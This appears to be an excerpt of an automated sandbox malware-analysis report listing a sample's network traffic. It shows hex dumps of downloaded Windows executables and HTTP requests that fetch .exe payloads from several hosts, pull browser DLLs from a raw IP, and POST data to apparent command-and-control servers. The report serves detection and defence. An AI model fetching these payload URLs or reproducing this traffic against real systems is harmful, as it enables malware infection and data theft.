00 00 05 00 01 00 00 00 00 00 00 60 76 00 00 04 00 00 2e b2 0c 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 61 01 00 50 00 00 00 00 e0 75 00 c8 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 56 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 e5 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 6a 00 00 00 00 01 00 00 6c 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 6e 74 00 00 70 01 00 00 08 0a 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 79 00 00 00 e0 75 00 00 7a 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 16:51:08 GMTContent-Type: application/octet-streamContent-Length: 283648Last-Modified: Wed, 27 Mar 2024 17:00:03 GMTConnection: closeETag: "66045093-45400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 18 42 e4 08 5c 23 8a 5b 5c 23 8a 5b 5c 23 8a 5b 33 55 14 5b 44 23 8a 5b 33 55 20 5b 28 23 8a 5b 33 55 21 5b 7b 23 8a 5b 55 5b 19 5b 57 23 8a 5b 5c 23 8b 5b 37 23 8a 5b 33 55 25 5b 5d 23 8a 5b 33 55 10 5b 5d 23 8a 5b 33 55 17 5b 5d 23 8a 5b 52 69 63 68 5c 23 8a 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c9 f0 b2 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 f4 00 00 00 92 13 00 00 00 00 00 b1 1e 00 00 00 10 00 00 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 14 00 00 04 00 00 27 7f 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 5c 03 00 78 00 00 00 00 c0 13 00 b6 d9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 53 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 f2 00 00 00 10 00 00 00 f4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 55 02 00 00 10 01 00 00 56 02 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 42 10 00 00 70 03 00 00 2c 00 00 00 4e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b6 d9 00 00 00 c0 13 00 00 da 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Mar 2024 16:51:15 GMTServer: ApacheLast-Modified: Thu, 07 Mar 2024 16:56:25 GMTETag: "682058-61314f4b1ca93"Accept-Ranges: bytesContent-Length: 6824024Cache-Control: max-age=31536000, publicExpires: Fri, 28 Mar 2025 16:51:15 GMTVary: Accept-EncodingReferrer-Policy: no-referrer-when-downgradePragma: publicKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 0a 00 69 3a e2 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 50 03 00 00 a4 13 00 00 00 00 00 7f e5 97 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 ce 00 00 04 00 00 ba bb 68 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 c7 98 00 f0 00 00 00 00 40 ca 00 28 07 04 00 00 00 00 00 00 00 00 00 00 06 68 00 58 1a 00 00 00 20 ca 00 24 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 66 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2b 4f 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c3 29 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 9b 00 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 cb 86 c2 a4 29 59 34 00 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 cb 86 c2 a4 a0 12 1e 00 00 90 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 c2 a2 7b c2 4b 70 0f 00 00 b0 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 76 6d 70 c2 a2 7b c2 24 02 00 00 00 30 66 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 a2 7b c2 d0 d9 63 00 00 40 66 00 00 da 63 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 24 1a 00 00 00 20 ca 00 00 1c 00 00 00 e2 63 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 07 04 00 00 40 ca 00 00 08 04 00 00 fe 63 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Mar 2024 16:51:49 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 78.46.229.36 78.46.229.36
            Source: Joe Sandbox ViewIP Address: 104.21.94.2 104.21.94.2
            Source: Joe Sandbox ViewIP Address: 81.94.159.197 81.94.159.197
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: WESTCALL-ASRU WESTCALL-ASRU
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: resergvearyinitiani.shop
            Source: global trafficHTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14034Host: resergvearyinitiani.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16264Host: resergvearyinitiani.shop
            Source: global trafficHTTP traffic detected: GET /file/d/1Qqy-57DLmiipUvNEOUGrNV3pL-1VKzB_/view?usp=sharing HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19970Host: resergvearyinitiani.shop
            Source: global trafficHTTP traffic detected: GET /e0cbefcb1af40c7d4aff4aca26621a98.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: jennyilis.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1266Host: resergvearyinitiani.shop
            Source: global trafficHTTP traffic detected: GET /2b7fa37605b0ad5f1a14cbc68bbdca6f/e0cbefcb1af40c7d4aff4aca26621a98.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kilperdoper.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 580592Host: resergvearyinitiani.shop
            Source: global trafficHTTP traffic detected: GET /attachments/1079752687278628966/1218325194725265428/Fupyivruk.exe?ex=660740c1&is=65f4cbc1&hm=fd820d24e53345690281599b22ef3adb9ee8518e9dbf6fb23e9b0949a35af707& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJDGHCBGDHIECBGIDAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJJKEHCAKFBFHJKEHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 7985Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKJJECAEGCBGDHDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBFHJDAAFBAKEBGIJKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJJKEHCAKFBFHJKEHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJECFHCBKKEBAKFIJDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 132793Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBAFBKEGCFBGCBFIDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmfugrrqioxydpvj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qxhroocyyify.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yyrmwlijroc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://phdpdtvujavixd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ekbhjiugbuwcwtmu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://twoursfynqoileqq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fupehafhlnpyou.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edhynpdtmkea.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: trad-einmyus.com
